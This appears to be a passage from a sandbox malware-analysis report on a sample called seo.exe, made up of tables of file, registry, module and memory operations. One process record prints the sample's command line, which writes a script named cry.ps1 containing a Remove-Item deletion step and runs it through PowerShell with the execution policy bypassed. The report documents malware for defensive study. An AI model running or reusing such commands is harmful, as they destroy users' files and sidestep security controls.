| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
652 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Read | STD_OUTPUT_HANDLE | size = 1, size_out = 1 |
|
91 | |
| Write | STD_OUTPUT_HANDLE | size = 36 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 33 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 95 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 62 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 45 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 139 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 66 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 28 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 40 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 115 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 50 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 89 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 90 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 133 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 57 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 46 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 119 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 175 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 104 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 99 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 87 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 102 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 106 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 170 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 160 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 162 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xc78, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x80000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (23)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
8 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\CIiHmnxMn6Ps |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
|
1 |
Process #4: cmd.exe
52
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | cmd.exe /c mkdir C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:00:31, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc78 |
| Parent PID | 0xc68 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C7C
0x
C80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00080000 | 0x000cffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x04a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a10000 | 0x04a10000 | 0x04a1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a33fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a40000 | 0x04a40000 | 0x04a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bb0000 | 0x04bb0000 | 0x04bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bc1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04dc0000 | 0x04e7dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecb0000 | 0x7ecb0000 | 0x7edaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edb0000 | 0x7edb0000 | 0x7edd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007edd6000 | 0x7edd6000 | 0x7edd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edd9000 | 0x7edd9000 | 0x7edd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eddc000 | 0x7eddc000 | 0x7eddefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eddf000 | 0x7eddf000 | 0x7eddffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | - |
|
1 | |
| Create Directory | C:\Users | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules | - |
|
1 | |
| Create Directory | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | - |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 40, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x80000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #5: cmd.exe
80
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:25, Reason: Self Terminated |
| Monitor Duration | 00:00:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcb0 |
| Parent PID | 0xc38 (c:\users\ciihmnxmn6ps\desktop\seo.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CB4
0x
CB8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00080000 | 0x000cffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x040cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000040d0000 | 0x040d0000 | 0x040effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000040d0000 | 0x040d0000 | 0x040dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000040e0000 | 0x040e0000 | 0x040e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040f0000 | 0x040f0000 | 0x040f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040f0000 | 0x040f0000 | 0x040f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004100000 | 0x04100000 | 0x04113fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x0415ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004160000 | 0x04160000 | 0x0425ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004260000 | 0x04260000 | 0x04263fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004270000 | 0x04270000 | 0x04270fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004280000 | 0x04280000 | 0x04281fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04290000 | 0x0434dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x0438ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043e0000 | 0x043e0000 | 0x043effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043f0000 | 0x043f0000 | 0x044effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x046bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x048affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x048b0000 | 0x04be6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efa0000 | 0x7efa0000 | 0x7f09ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f0a0000 | 0x7f0a0000 | 0x7f0c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0c4000 | 0x7f0c4000 | 0x7f0c4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0c8000 | 0x7f0c8000 | 0x7f0cafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0cb000 | 0x7f0cb000 | 0x7f0cbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0cd000 | 0x7f0cd000 | 0x7f0cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (21)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | cmd.exe | type = file_attributes |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
10 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
